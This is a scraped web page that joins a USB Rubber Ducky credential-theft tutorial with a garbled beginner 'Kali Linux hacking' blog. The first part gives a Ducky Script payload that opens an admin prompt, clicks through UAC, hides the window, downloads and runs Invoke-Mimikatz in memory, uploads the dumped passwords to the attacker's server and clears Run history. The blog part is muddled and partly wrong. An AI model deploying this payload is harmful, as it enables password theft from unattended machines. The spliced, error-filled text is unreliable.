Pilfering Passwords with the USB Rubber DuckyCan you social engineer your target into plugging in a USB drive? How about distracting ’em for the briefest of moments?

15 seconds of physical access and a is all it takes to swipe passwords from an unattended PC.In honor of the appearance on a recent episode of, we’re recreating this hollywood hack and showing how easy it is to deploy malware and exfiltrate data using this Hak5 tool.The is the original keystroke injection attack tool. That means while it looks like a USB Drive, it acts like a keyboard – typing over 1000 words per minute. Specially crafted payloads like these mimic a trusted user, entering keystrokes into the computer at superhuman speed.

Once developed, anyone with social engineering or physical access skills can deploy these payloads with ease. Since computers trust humans, and inherently keyboards, computers trust the USB Rubber Ducky. So let’s go violate this trustThe payload in question here uses a variant of, a tool by that can dump cleartext passwords from memory. The variant by reflectively injects mimikatz into memory using powershell – so mimikatz never touches the computer’s hard disk. Using an altered method by, the powershell script is pulled directly from your server and executed in memory.Once deployed this payload will open an admin command prompt, bypass UAC, obfuscate input, download and execute Invoke-Mimikatz from your server, then upload the resulting cleartext passwords and other credentials back to your server. When it’s all said and done you’ll go from plug to pwned in about 15 seconds.

What you’ll needTo pull off this attack you’ll need:. Any web server on the Internet with PHP (preferably something mostly anonymous). A. This ducky script payload. This Invoke-Mimikatz powershell file. This credential saving PHP scriptStep 1: Writing the PayloadUSB Rubber Ducky payloads are written in Ducky Script – a ridiculously simple scripting language that can be written in any ordinary text editor, so fire up notepad, vi, emacs or the like.

Initial delay REM Title: Invoke mimikatz and send creds to remote server REM Author: Hak5Darren Props: Mubix, Clymb3r, Gentilkiwi DELAY 1000The first command, REM, is just a comment. It’s always good practice to comment your code. The second command, DELAY, tells the USB Rubber Ducky to pause for 1000 milliseconds.

This delay will give the target computer enough time to recognize the USB Rubber Ducky as a keyboard before it begins typing. Open administrator command promptREM Open an admin command prompt GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 2000 ALT y DELAY 1000The above snippet opens an admin command prompt using the powershell method. GUI r is equivalent to holding down the Windows key and pressing R, which opens the Windows Run dialog.The powershell runAs verb starts the process with administrator permissions. This is the same as opening cmd with the Run as administrator option.Once the powershell command is typed and enter is pressed, a UAC dialog will popup. This is bypassed by holding ALT and pressing Y for Yes.

Voila – admin command prompt! Obfuscate the command promptWhile not necessary, it’s always nice to obfuscate the command prompt as to bring as little attention to the attack as possible. Depending on your scenario this section may or may not be necessary.

REM Obfuscate the command prompt STRING mode con:cols=18 lines=1 ENTER STRING color FE ENTERThe first mode command reduces the command prompt window to as small as possible. The second changes the color scheme to a difficult to read yellow on white.

The hope is that the tiny white window will blend in with the rest of the windows on the screen. Thankfully this payload is extremely short, so it’ll only be open for a brief time. Download and execute the payloadNow with our obfuscated admin command prompt open it’s time to download the Invoke-Mimikatz payload into memory, execute it, and pass the resulting credentials back to our server. REM Download and execute Invoke Mimikatz then upload the results STRING powershell 'IEX (New-Object Net.WebClient).DownloadString('$output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('$output)' ENTER DELAY 15000The powershell IEX or directive tells it to execute everything following rather than just echoing it back to the command line.

The cmdlet creates an instance of the Microsoft.NET Framework. Using the class we can now send and receive data from standard web servers.The method downloads the resource, specified as a URL, as a string. In this case it’s the Invoke-Mimikatz powershell script hosted on our web server.

This is then executed with the -DumpCreds parameter. The resulting passwords and other credentials are saved in memory in the $output variable.Finally the method uploads the credentials, stored in the $output variable, to the URL specified. In this case it’s a PHP receiver script sitting on our web server ready to store the creds for our viewing pleasure.In this example I’m using my own web server at, so be sure to change this to match the URL of your own. Download driver ucom web camera. Clearing your tracksOnce the Invoke-Mimikatz payload has executed and you’ve captured the credentials, you’ll want to clear your tracks. Since cmd doesn’t maintain a persistent command history, everything typed in the command prompt will be gone after the exit command is issued. The Run dialog on the other hand maintains a list of recently used commands in the Windows registry.

Let’s clear it. REM Clear the Run history and exit STRING powershell 'Remove-ItemProperty -Path 'HKCU:SoftwareMicrosoftWindowsCurrentVersionExplorerRunMRU' -Name '.'

-ErrorAction SilentlyContinue' ENTER STRING exit ENTERThe cmdlet deletes items from the Windows registry. In this case the asterisk (.) wildcard is used to delete all items in the RunMRU path. Finally exit closes our tiny command prompt window.That’s it – ducky script complete! Download a copy here and be sure to change the URL to that of your own web server.

Step 2: Encoding the PayloadNow that the invoke-mimikatz.txt ducky script has been customized with your web server URL, you’re ready to encode it. The USB Rubber Ducky is expecting an inject.bin file on the root of its microSD card. This file is the binary equivalent of the ducky script text file written in the previous step.

To convert the ducky script text file into an inject.bin binary, use the Duck Encoder.java -jar duckencode.jar -i invoke-mimikatz.txt -o inject.binThe above command tell the duck encoder to take the input file, the invoke-mimikatz.txt ducky script, and convert it into the binary output file, the inject.bin. Then it’s just a matter of copying the inject.bin file to the root of a microSD card and plugging it into the USB Rubber Ducky. Step 3: Setting up the Web ServerYou’ll need a web server to host the Invoke-Mimikatz powershell script, as well as a way to receive the credentials.

This PHP script will save any post data into individually time and date stamped.cred files including the host IP address. It goes without saying that HTTPS would be preferred in this instance. See the Hak5 on setting up SSL on your web server for free. In addition to the rx.php script to receive the HTTP post data from the target PC, you’ll need to host the Invoke-Mimikatz powershell script. You can grab the latest version and save it to your web server. Step 4: Deploying the AttackFinally with your web server hosting the Invoke-Mimikatz script and PHP credential receiver you’re ready to rock and roll! Pop the into its covert USB Drive case and head out on your next physical engagement armed with this 15 second password nabbing payload!

After installing Kali Linux successfully you will looking for solution of. where to start learning it. How to use itEveryone face these problems even me But after covering these tutorials you have ability to make own tutorials or understand every tutorials available on the INTERNETYou just need to understand this articles step by step.Requirements.

Internet connection. PassionOK, first of all read these hacking terms before moving to kali linux tutorials. Hacking terms you must knowPhishing: basically, phishing is a way to hack online accounts (like Facebook, Gmail) by making fake login page similar to the original login page. When you open a phishing page it looks like an original page, for example, see this screenshotDo yo think it is original but it is fake see the URL Generally all online account login websites have SSL certificate mean https s mean secure.The advance version of phishing:Desktop PhishingTabnappingDesktop Phishing: This is the advanced type of phishing. It is same as above method, but in this approach, URL is not replaced your computer is affected by this process and when you open hacker fake page will open, but URL will not change. Here I try to explain it All modern browser detect desktop phishing and you need physical access to create desktop phishing page.

Search on google if you need more info but enough for beginners. Tabnapping: If you open many tabs on browsing the internet then your account can be easily hacked by this method. In this attack when the victim clicks on the link from another site, for example, You and me are friends on Facebook, and I send you to link on Facebook by the message.When you open the link and 2-3 another tab, then your facebook tab page Url will be replaced by another page.

You will think your account is logged out automatically. You will again Login your account and I will get your password you will be redirected toKeylogger: this is software of hardware which records every word typed by the victim from the keyboard. The main purpose of keyloggers are for because it records keyword, so it will also record password and username. Here are two types of Keylogger.

Software keylogger: These are software which records every keystroke. You can download free keylogger from the internet or make own if you can good knowledge of programming. Hardware Keylogger: Hardware keylogger are is hardware device which needs to connect to computer then it records our keystrokes. Nowadays Hardware keyloggers are attached to the keyboard for hacking credit cards etc.

Here are some hardware keyloggersBrute force attack: Another great way to hack passwords, Hacker just guess password length and characters used for the password. After that software combination all these factors and create so many words and try to apply as every word as a password. It is a time-consuming method.Wordlist attack: It is similar to above one but in these first hacker generates words and save these words to file using software like crunch. Another software applies every word as a password.

This attack used in. Aircrack can try 969 words/second as the password.Encryption: Generally it is used for encrypting the password in the database. In the database, it is stored in encrypted format. E.x.Original message: This is a lineEncrypted format: gfEDdWzoKboa9gTFLeb2D476vTgIt protects your password if a hacker hack website database. If you are from India and then you know about paytm.Paytm use 128-bit encryption mean if it will increase your password length which has 2 128 combinations for applying brute force attack.Ransomeware: It is a code program by Hacker which encrypts (mean make them so nobody can open that data) your whole Hard disk data then ask for some Money if you want to remover your data. You can format your full hard disk or pay money to Hacker.IP address: Ip stands for internet protocol.

It is the address of our Device. To find your IP address type in google what is my IP. There are two types of Ip address. I) Public IP II) private IP. We connected through the internet by Public IP address.

It can be changed by Vpn or using the proxy.Vpn: VPN stands for virtual private network. VPN basically change your IP address. If you are using a Vpn and doing anything, nobody can know until VPN company does not expose you free VPN can if you doing something serious Ilegal. Here is the working of VpnWeb Server: 90% of you know what is web server but I you don’t know! It is a computer where files of a website are available. For example, above image, text etc are stored on the computer it is known as the web server.Dos attack: it stands for Denial of service.

Mainly used to make website down or unavailable. Fake traffic is sent to the web server. When data exceeds the limit of bandwidth, server crushes. Here is server down website screenshot when the server is down.source easiest way to protect Dos attack is a firewall which blocks activity from a particular computer.DDOS attack: it stands for Distributed Denial of service.

In dos attack, there is only one machine but it DDOS there is multiple fake devices as shown in the screenshot. There is only one way to protect DDOS attack.

Hacking

Again firewall but here is working of the firewall is different Firewall can tolerate this attack like me I am using CloudFlare CDN for protecting DDOS attack. Source: gohacking.comSQL injection: DDOS attack crush the server but SQL injection helps you to hack websites. Hacker injects queries in the website database.Social engineering: It is not the hacking method.

It is Hacking by the average person. Guessing password technique is known as social engineering. I am not expert in this, and it takes a lot of time. Different for the different person so very time-consuming.

Language You should learn for HackingPython: Ask from any hacker. Every hacker must recommend Python. It is so easy and powerful. After completing you will able to read or write any Python syntax. Beside Hacking, Python also helps in data science.But you can’t hack anything using python for Hacking websites then you have to learn SQL injection, XSS. Now don’t search on google learn SQL injection because for understanding SQL injection you have knowledge of SQL Database, PHP, Javascript, CSS, and HTML.

This is a long process.Types of Hacker: There are three types of Hacker. Blackhat Hacker: These hackers are criminals they miss use hacking knowledge.

White hat hacker: These hackers are ethical hacker, or they use their knowledge for protecting computers. Gray hat hacker: This type of hacker work for money, or you can they work like both white hat and gray hat hackers.Kali Linux Hacking tutorialsPosted: March 25, 2017Welcome to the second chapter In this we will discuss installing Kali Linux If you don’t know what is Kali Linux? It is operating system used by hackers because it has all software that needed in Hacking. It is free and open source Installing Kali Linux is some complex for beginners here is the full post to know how to fix it. You can dual boot with windows or install it inside the window known as virtualization.

No more words let come to point How to dual boot with KaliPosted: March 25, 2017Hope you have installed Kali Linux in virtual box or using any other way. In this lesson, I am talking about basic commands in Kali Linux, not all only that you needed in starting a + free source of learning all Linux commands. Before commands, I want to introduce you Terminal. The terminal is software as commands prompt available is window operating system. Linux works on command system, hacking also. You can open terminal from the sidebar as shown in the screenshot. To understand File directory of Linux is important.

Directory mean folder root is the Main directory of Linux it is shown denotedPosted: March 25, 2017In this lesson, we well talk about how can you hide your identity/browse anonymously or Change Ip address There are several ways to hide or change your Ip address in Kali Linux Using proxychain Using Vpn Make sure you visit hacking for beginners to know how proxy and VPN are working. In this method, you change IP address by going the number of proxy as wish as you want. Kali has a proxy file you have to edit your working proxy manually. Proxychain is working by three ways.

Static: by default it is static. In this system is go all proxy. IfPosted: October 17, 2016Now, day’s we can’t imagine our life without the internet. Wi-Fi is the most popular internet connection. That’s why Hack WiFi is most popular on Google trends from hacking. In this post, I am guiding you about how can you hack and secure your wifi. Here is the basic guide for beginners.

Here I have mentioned working methods of wireless network attacks and also mention software. I always prefer Kali Linux operating system for any hacking. Kali has preinstalled all tools that are needed in wifi hacking like aircrack-ng (best software to crack a wifi). No doubt some software also available forPosted: March 25, 2017In this post, we will talk about the Metasploit framework. I am sure you have enough heard about Metasploit and maybe still confuse what is this and how to use it? It is framework mean it is the collection of number of Softwares.

You can gather information, make malware, hack FTP, hack Android, and many other things. You will know when you use it. This is a pre-installed framework in Kali Linux or parrot. It has paid and free version. Off course, Kali has a free version. Not only in Kali you can install it in the window too. Metasploit is also integratedPosted: April 16, 2018For the website hacking, SQL injection is very famous.

In this article, I will explain everything from scratch.Note: Most of the visitors will not understand with tutorials if you don’t have any patience.To understand SQL injection first you should knowwhat is SQLwell, SQL is the query structured language used editing databaseAfter reading all this, you have some hacking skills here are some pdf about Kali Linux Hacking which you should readWeb penetration testing with Kali Linux:I like this book here a detailed guide about website hacking from information gathering to exploiting. Here are not only Kali tools also some other tools like websites for the collection of information which is helpful. Here is explained all attacks like SQL INJECTION, XSS, Exploiting server flaws, Authentication & Hijacking techniques are described.

Cracking Tutorial

You can or buy from Amazon at $3.92Basic Security Testing with Kali Linux:For beginners, this is the best source. It will teach you from starting like kali overview, Metasploit Tutorials, Information Gathering, Exploiting Windows and Linux, wireless attack, password hacking techniques and security tips for your network, etc.Buy from AmazonMastering Kali Linux for advanced penetration:As evident from this book name, it is for masters. Here is physical security, social engineering, web services and attacking network direct end user are explained very well.

For those who want to make the career in It Security, it is the best to book.Buy from Further steps to become master in HackingGet free paid video hacking course by sharing this: If you share this post you will receieve a video hacking course (orginal price is $10). Believe it one of best course at this pricesociallocker id=”1925″ /sociallockerNetworking: networking is an important part of Hacking. On the internet thousands of thousand blog available to learn networking.this is a website for learning the use of any Hacking tools visit it daily and learn something new.

Hacking Tutorial For Beginners

Websites you should visit:tool.kali.org does not provide hacking tutorials Check out these websites. I advise you to visit daily.today this is no. Blog In Hacking/pen testing niche. I visit daily null byte also available forums to ask question: On Github, you can find scripts of any language related to anything like keylogging, etc.Now you know your path to become a Pen tester.If you have any suggestion related these Kali Linux tutorials then you can mention your suggestion using comments. Categories Post navigation.

Posted :